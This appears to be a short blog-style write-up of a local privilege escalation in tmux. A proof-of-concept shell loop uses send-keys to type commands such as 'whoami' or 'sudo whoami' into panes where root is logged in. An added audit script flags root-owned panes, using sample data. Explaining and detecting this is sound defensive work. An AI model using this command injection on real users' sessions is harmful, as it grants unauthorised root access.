tmux privilege escalation abusing send-keys

A script run as an unprivileged user inside tmux can, under some circumstances, execute commands as root.

tl;dr

Did you know you can send keystrokes to other panes in tmux?

You can abuse send-keys to send commands to a root/sudo pane.

That's all there is to it, that's the trick.

send-keys

There's a tmux feature to send keystrokes to a pane.

For example, tmux send-keys -t $pane 'C-c' sends Ctrl-C, and with it SIGINT, to whatever is running in pane $pane.

man tmux

When I saw the send-keys feature, I was like:

"What if there's another pane, where the user is logged in as root?"

poc||gtfo

preparations

tmux
tmux sp
su # login as root

Now go back to the other tmux pane (where you are logged in as user).

action

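Now run the following script to execute whoami in every pane:

#!/bin/sh
# Send "whoami" to every pane of the current window.
for pane in $(tmux list-panes -F '#{pane_index}'); do
    tmux send-keys -t "$pane" C-c             # interrupt whatever is running
    tmux send-keys -t "$pane" 'whoami' Enter  # type the command and press Enter
done

In the pane where you logged in as root, whoami returns root, as expected.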

sudo

The same trick can abuse a pane in which sudo has already been used:

tmux send-keys -t "$pane" 'sudo whoami' Enter
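To check a running tmux server for this exposure, the following added example (not part of the original post) lists the panes whose tty currently hosts a process with effective UID 0. It assumes Linux procps ps output; the function names and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag tmux panes that have a root-owned process on their tty.

# find_root_panes PANES PS
#   PANES: lines "pane_id pane_tty"  (tmux list-panes -a -F '#{pane_id} #{pane_tty}')
#   PS:    lines "tty euid command"  (ps -eo tty=,uid=,comm=)
# Prints "pane_id tty command" for every euid-0 process attached to a pane's tty.
find_root_panes() {
    { printf '%s\n' "$1"; echo '--'; printf '%s\n' "$2"; } | awk '
        $0 == "--" { in_ps = 1; next }          # separator: ps listing starts here
        !in_ps && NF >= 2 {                     # pane list: remember tty -> pane id
            sub("^/dev/", "", $2)               # tmux prints /dev/pts/N, ps prints pts/N
            pane[$2] = $1
            next
        }
        in_ps && $2 == 0 && ($1 in pane) {      # root process on a tmux-owned tty
            print pane[$1], $1, $3
        }
    '
}

# Live use against the running tmux server (needs tmux and ps; not run here).
scan_live() {
    find_root_panes "$(tmux list-panes -a -F '#{pane_id} #{pane_tty}')" \
                    "$(ps -eo tty=,uid=,comm=)"
}

# Constructed sample data: pane %1 has "su" and a root shell running on its tty.
SAMPLE_PANES='%0 /dev/pts/3
%1 /dev/pts/4
%2 /dev/pts/5'
SAMPLE_PS='pts/3     1000 zsh
pts/4     1000 zsh
pts/4        0 su
pts/4        0 bash
pts/5     1000 vim
?            0 sshd'

find_root_panes "$SAMPLE_PANES" "$SAMPLE_PS"
```

Call scan_live inside a real session to audit it. A pane where sudo was only used earlier has no root process left on its tty, so this check does not flag it.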
